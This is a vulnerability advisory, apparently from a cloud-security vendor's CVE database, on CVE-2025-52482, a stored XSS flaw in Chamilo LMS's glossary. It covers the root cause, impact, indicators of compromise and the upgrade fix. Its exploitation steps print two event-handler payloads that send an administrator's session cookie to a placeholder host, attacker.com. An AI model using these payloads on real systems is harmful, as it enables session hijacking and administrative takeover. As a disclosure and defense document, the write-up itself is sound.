CVE-2025-52482: 
Chamilo vulnerability analysis and mitigation

Overview

CVE-2025-52482 is a Stored Cross-Site Scripting (XSS) vulnerability in the glossary function of Chamilo LMS, a widely used open-source learning management system. It affects all versions prior to 1.11.30 (specifically confirmed through version 1.11.28), allowing users with the Teacher role to inject malicious JavaScript into glossary term entries that executes in the browser of any administrator who views the glossary. The vulnerability was discovered by researcher ElyseRuyssen during work at BZHunt and publicly disclosed on March 1–2, 2026. It carries a CVSS v3.1 base score of 8.3 (High) (GitHub Advisory, Feedly).

Technical details

The root cause is improper neutralization of user-supplied input during web page generation (CWE-79). Specifically, the glossary function in /main/glossary/index.php failed to adequately sanitize the term parameter before storing it in the database; the stored payload is later rendered unsanitized in /main/tracking/course_log_resources.php when an administrator reviews course resources. The fix involved applying an attr_on_filter to text input fields in FormValidator.class.php and introducing a new RemoveOnAttributes HTML Purifier filter that strips on* event handler attributes from stored HTML, as well as replacing inline JavaScript-based delete confirmations with a modal dialog in glossary.lib.php (GitHub Commit 241c569, GitHub Commit 82cc07e, GitHub Commit f915007).

Impact

Successful exploitation allows a Teacher-role attacker to execute arbitrary JavaScript in the browser context of an administrator who views the affected glossary. This can result in session hijacking (theft of admin session cookies), credential harvesting, unauthorized administrative actions (e.g., creating new admin accounts, modifying platform settings), and exposure of sensitive data accessible to administrators. The scope change in the CVSS score reflects that the impact crosses from the teacher's security context into the administrator's, with high confidentiality and integrity impact (GitHub Advisory, Feedly).

Exploitability

A proof-of-concept reference is available via the GitHub Security Advisory (GHSA-4wcp-3rh3-7wm4), though no evidence of active in-the-wild exploitation has been reported as of the time of disclosure. Exploitation requires the attacker to already hold a Teacher-role account on the target Chamilo instance and requires an administrator to interact with the glossary (user interaction required). The EPSS score is approximately 0.038%, indicating a low current probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory, Feedly).

Exploitation steps

  1. Obtain Teacher Access: Log in to the target Chamilo LMS instance using a valid Teacher-role account (obtained through registration, social engineering, or credential compromise).
  2. Navigate to Glossary: Access a course managed by the teacher account and navigate to the Glossary tool at /main/glossary/index.php.
  3. Inject Malicious Payload: When adding or editing a glossary term, insert a JavaScript payload into the "term" field. For example, use an event-handler-based payload such as <input onmouseover="document.location='https://attacker.com/steal?c='+document.cookie" value="HoverMe"> or a simpler <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)> to exfiltrate the administrator's session cookie.
  4. Store the Payload: Submit the glossary entry; the malicious JavaScript is stored in the database without adequate sanitization.
  5. Wait for Administrator Interaction: The payload executes when an administrator views the glossary or accesses course log resources at /main/tracking/course_log_resources.php, triggering the script in the admin's browser context.
  6. Harvest Credentials or Hijack Session: Collect the exfiltrated session token from the attacker-controlled server and use it to impersonate the administrator, gaining full platform control (GitHub Advisory).

Indicators of compromise

  • Logs: Chamilo access logs showing POST requests to /main/glossary/index.php containing HTML event handler patterns (e.g., on\w+=, onerror=, onmouseover=) in the term parameter; access log entries for /main/tracking/course_log_resources.php from administrator accounts shortly after suspicious glossary entries were created.
  • Database: Glossary term entries in the database containing raw HTML tags or JavaScript event handlers (e.g., <script>, onerror=, onload=, fetch(, document.cookie) in the name or description fields of the glossary table.
  • Network: Outbound HTTP requests from the administrator's browser to unexpected external domains immediately after accessing the glossary or course log resources pages; DNS queries or HTTP GET requests to attacker-controlled infrastructure containing encoded cookie or session data in URL parameters.
  • Browser/Session: Unexpected administrator session activity (logins from new IPs, configuration changes, new account creation) following an administrator's visit to the glossary function.

Mitigation and workarounds

Upgrade Chamilo LMS to version 1.11.30 or later, which addresses this vulnerability by applying on* attribute filtering via a new RemoveOnAttributes HTML Purifier filter and adding the attr_on_filter to text input fields (GitHub Release v1.11.30, GitHub Advisory). For systems that cannot be immediately patched, consider restricting access to the glossary function for Teacher-role users via network controls or application-level permissions, and limit administrator access to trusted networks only. Additionally, audit existing glossary entries for suspicious JavaScript payloads and monitor teacher accounts for unusual activity.

Community reactions

The vulnerability was reported by researcher ElyseRuyssen, credited in the official GitHub Security Advisory, who discovered it during work at BZHunt. The disclosure received moderate community attention, with mentions on Mastodon, Bluesky, and CVE tracking feeds shortly after publication in early March 2026. No major vendor statements beyond the Chamilo project's own advisory and patch release have been identified.

Additional resources


Source: This report was generated using AI

Related Chamilo vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-45140CRITICAL9.8
  • PHP logoPHP
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-39878CRITICAL9.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-45143CRITICAL9
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-34239HIGH7.5
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-82535MEDIUM5.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoNoSep 11, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management